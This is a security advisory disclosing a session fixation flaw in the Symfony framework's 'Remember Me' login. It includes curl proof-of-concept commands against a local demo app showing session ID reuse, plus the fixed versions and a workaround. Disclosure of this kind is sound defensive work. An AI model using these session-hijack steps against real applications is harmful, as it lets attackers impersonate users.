Symfony PHP Framework Session Fixation

`Advisory: Symfony PHP Framework: Session Fixation In "Remember Me" Login  
Functionality  
  
A session fixation vulnerability within the Symfony web application  
framework's "Remember Me" login functionality allows an attacker to  
impersonate the victim towards the web application if the session ID  
value was previously known to the attacker.  
  
  
Details  
=======  
  
Product: Symfony  
Affected Versions: 2.3.0 to 2.3.34, 2.6.0 - 2.6.11, 2.7.0 - 2.7.6  
Fixed Versions: 2.3.35, 2.6.12, and 2.7.7 [2]  
Vulnerability Type: Session Fixation  
Security Risk: low  
Vendor URL: https://symfony.com/  
Vendor Status: fixed version released [2]  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-013  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"Symfony is a set of PHP Components, a Web Application framework, a  
Philosophy, and a Community — all working together in harmony."  
  
(from Symfony's homepage)  
  
  
More Details  
============  
  
The following details are explained using the official Symfony Demo  
application[0]. The "Remember Me" login functionality was activated  
according to [1]. The security configuration file was modified as  
follows:  
  
-- app/config/security.yml ---------------------------------------------  
  
security:  
[...]  
firewalls:  
secured_area:  
[...]  
remember_me:  
key: "IdOpAkToufatt8knawt{"  
lifetime: 604800  
path: /  
always_remember_me: true  
  
------------------------------------------------------------------------  
  
If the following URL is requested, the Symfony application redirects to  
a login screen where a username and password must be supplied:  
  
$ curl -I 'http://localhost:8000/en/admin/post/'  
HTTP/1.1 302 Found  
Host: localhost:8000  
[...]  
Set-Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3; path=/  
Location: http://localhost:8000/en/login  
  
On submission, an HTTP POST request is performed by the browser:  
  
POST /en/login_check HTTP/1.1  
Host: localhost:8000  
Referer: http://localhost:8000/en/login  
Cookie: PHPSESSID=8a17gpfjtnfqfdhabthso92sk3  
[...]  
  
_username=anna_admin  
&_password=kitten  
&_csrf_token=h_s6ltxHB3gbGU--SIY6wLCUGf84bLmhs1_LGFEBsUI  
  
If the supplied credentials are correct, the Symfony application  
responds as follows:  
  
HTTP/1.1 302 Found  
Host: localhost:8000  
Set-Cookie: PHPSESSID=vk2e3enjr0uafgonr0i3u2b4t5; path=/  
Set-Cookie: REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnP  
T06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y  
2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk; expires=Thu,  
29-Oct-2015 12:27:14 GMT; Max-Age=604800;  
Location: http://localhost:8000/en/admin/post/  
[...]  
  
The cookie PHPSESSID is set to a new value and a new cookie named  
REMEMBERME is set in the client. The PHPSESSID is a session cookie  
only and has a limited lifetime. In contrast, the REMEMBERME cookie has  
a validity of one week. It allows users to stay logged in for longer  
than the regular session lasts.  
  
The REMEMBERME cookie's value consists of four data fields separated by  
colons and is encoded in base64. The first data field references the  
application's user object, followed by the base64-encoded username. The  
third data field is a timestamp of the cookie's expiration date. The  
last one is a MAC value to protect the other three against manipulation.  
  
$ base64 -d <<< QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZVjloWkcxcGJnPT06MTQ\  
0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1NGU5Y2IwOWY0OWY3MTFhOD\  
NhMjUxNmU0OWE4Njg2MTVmNWRk  
AppBundle\Entity\User:YW5uYV9hZG1pbg==:1446121634:f09138bc[...]68615f5dd  
  
$ base64 -d <<< YW5uYV9hZG1pbg==  
anna_admin  
  
$ date -d @1446121634  
Thu Oct 29 13:27:14 CET 2015  
  
  
Proof of Concept  
================  
  
If the following URL is requested with an unauthorised session ID, the  
Symfony application redirects to the login page (as already shown  
above):  
  
$ curl -I 'http://localhost:8000/en/admin/post/' -b 'PHPSESSID=redteam'  
HTTP/1.1 302 Found  
Host: localhost:8000  
Location: http://localhost:8000/en/login  
[...]  
  
In the case that a valid REMEMBERME cookie is included in the HTTP  
request, the user is successfully authenticated:  
  
$ curl -s -i 'http://localhost:8000/en/admin/post/' \  
-b 'PHPSESSID=redteam; REMEMBERME=QXBwQnVuZGxlXEVudGl0eVxVc2VyOllXNXVZ'\  
'VjloWkcxcGJnPT06MTQ0NjEyMTYzNDpmMDkxMzhiYzkzYjVmYTk1MTNlYWMyYzY2OTQ1N'\  
'GU5Y2IwOWY0OWY3MTFhODNhMjUxNmU0OWE4Njg2MTVmNWRk'  
HTTP/1.1 200 OK  
Host: localhost:8000  
[...]  
  
<!DOCTYPE html>  
<html>  
[...]  
<tr>  
<td>In hac habitasse platea dictumst</td>  
<td>[email protected]</td>  
<td>8/23/15, 10:16 AM</td>  
[...]  
  
After this HTTP request, the PHPSESSID value suffices to authenticate  
the user. In contrast to the regular login procedure, the web  
application did not assign a new value to the PHPSESSID cookie. If an  
attacker somehow got in possession of the cookie's value or has  
successfully set a given cookie value in the user's browser at some  
point in the past, the attacker is now able to access the web  
application with the user's permissions:  
  
$ curl -s -i 'http://localhost:8000/en/admin/post/' \  
-b 'PHPSESSID=redteam'  
HTTP/1.1 200 OK  
Host: localhost:8000  
[...]  
  
<!DOCTYPE html>  
<html>  
[...]  
<tr>  
<td>In hac habitasse platea dictumst</td>  
<td>[email protected]</td>  
<td>8/23/15, 10:16 AM</td>  
[...]  
  
  
Workaround  
==========  
  
Disable the "Remember Me" login functionality within the configuration  
file security.yml.  
  
  
Fix  
===  
  
Upgrade to a fixed version if possible, otherwise refer to section  
Workaround.  
  
  
Security Risk  
=============  
  
The described vulnerability allows an attacker to access a Symfony web  
application with the attacked user's permissions. The attack requires  
that the "Remember Me" login functionality is used by the application.  
Additionally, the attacker either got access to the PHPSESSID cookie  
value or has successfully set a new value in the user's browser. Because  
of its requirements, the described vulnerability poses a low risk only.  
The risk estimation may be increased to medium or high based on the  
affected web application and the accessible data.  
  
  
Timeline  
========  
  
2015-09-11 Vulnerability identified  
2015-09-16 Customer approved disclosure to vendor  
2015-10-27 Vendor notified  
2015-11-23 Fixed by vendor [2]  
2015-12-22 Advisory released  
  
  
References  
==========  
  
[0] https://github.com/symfony/symfony-demo  
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html  
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`